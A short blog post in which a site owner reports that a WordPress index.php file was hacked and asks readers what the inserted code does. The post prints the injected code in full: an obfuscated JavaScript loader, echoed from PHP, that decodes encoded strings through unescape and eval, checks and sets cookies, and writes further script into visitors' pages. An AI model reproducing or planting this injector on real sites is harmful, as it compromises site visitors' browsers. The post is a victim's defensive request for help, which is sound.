This is the second time that one of my sites has been hacked. This time too it was not a serious hack. Just a random hack I guess. I use wordpress software on one of my blogs. The following file had been changed.
Filename: (root)\index.php
The normal contents of the file is as follows:
But I could see the changes that'd been made. The changed contents looked like this:
‹?phpI believe this is a javascript code used to some sort of unwanted activities. If anyone knows what this exact script does, then please do drop in some lines regarding this and the possible readiness for me to prevent such incidents.
/* Short and sweet */
define('WP_USE_THEMES', true);
echo '‹script language="javascript">$="Z63cZ3dZ226egthZ253bi+Z252bZ2529Z257btmpZ253dds.sZ256cZ2569ceZ2528i,Z2569+Z2531Z2529Z25Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dzZ3dZ22Z2566Z2575nZ2563Z2574Z2569on Z2564Z2577(t)Z257bcZ2561Z253dZ2527Z252564ocuZ2525Z2536dZ252565nZ252574.wrZ2525Z25369Z2574Z252565(Z252522Z2527;cZ2565Z253dZ2527Z252522Z252529Z2527Z253bcbZ253dZ2527Z25253csZ252563rZ25256Z2539pt Z2525Z2536cZ252561Z256eZ2567Z2575Z252561geZ25253dZ25255cZ252522jaZ2576asZ2563rZ252569Z2570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscriZ2570tZ25253eZ2527;evZ2561Z256c(Z2575nesZ2563apeZ2528t))Z257d;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;cbZ3dZ22Z2528ds)Z253bsZ2574Z253dtmpZ253dZ2527Z2527;for(iZ253d0;iZ253cdsZ252elZ2565Z25Z22;opZ3dZ22Z2524Z253dZ2522dw(dcsZ2528cu,Z2531Z2534));Z2522Z253bZ22;stZ3dZ22Z2573tZ253dZ2522$Z253dZ2573Z2574;Z2564Z2563Z2573(Z2564Z2561Z252bdZ2562+Z2564Z2563+Z2564dZ252bZ2564eZ252c1Z2530Z2529Z253bdZ2577(Z2573Z2574Z2529;Z2573Z2574Z253dZ2524;Z2522;Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;yqz`;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ceZ3dZ22Z2563haZ2572CodZ2565Z2541t(Z2530)Z255e(Z25270x00Z2527+esZ2529Z2529);}Z257dZ22;cdZ3dZ223bstZ253dsZ2574+StZ2572ingZ252efrZ256fmZ2543harZ2543odeZ2528(tmZ2570Z252eZ22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566uncZ2574ioZ256e czZ2528cz)Z257brZ2565tuZ2572n cZ2561+cbZ252bccZ252bcdZ252bceZ252bcZ257a;}Z253bZ22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;caZ3dZ22Z2566uncZ2574ionZ2520Z2564csZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573Z2563apeZ22;Z69Z66 (dZ6fcuZ6denZ74.coZ6fkZ69eZ2eindZ65xOZ66Z28Z27vbulZ6cZ65Z74in_Z6duZ6ctZ69Z71uotZ65Z3dZ27)Z3dZ3d-1)Z7bsc(Z27vbuZ6cleZ74Z69Z6e_muZ6ctiqZ75oZ74eZ3dZ27,2,7);Z65valZ28Z75neZ73Z63apZ65(Z64Z7a+czZ2boZ70+sZ74)Z2bZ27dw(dz+Z63Z7a($+Z73t))Z3bZ27)}elsZ65Z7b$Z3dZ27Z27};funZ63tioZ6eZ20scZ28cnmZ2cZ76,Z65d)Z7bvZ61r eZ78dZ3dnew DZ61tZ65(Z29;eZ78d.Z73eZ74DaZ74eZ28exdZ2egZ65tZ44atZ65Z28)Z2bZ65d)Z3bdoZ63umZ65ntZ2ecZ6fokiZ65Z3dcZ6em+ Z27Z3dZ27 +esZ63apZ65(Z76)+Z27;Z65xZ70Z69Z72eZ73Z3dZ27+exd.Z74oGMZ54Z53triZ6eg()Z3bZ7d;";function z(s){r="";for(i=0;i‹s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));document.write($);';
require('./wp-blog-header.php');
?›
Thanks in advance.
No comments:
Post a Comment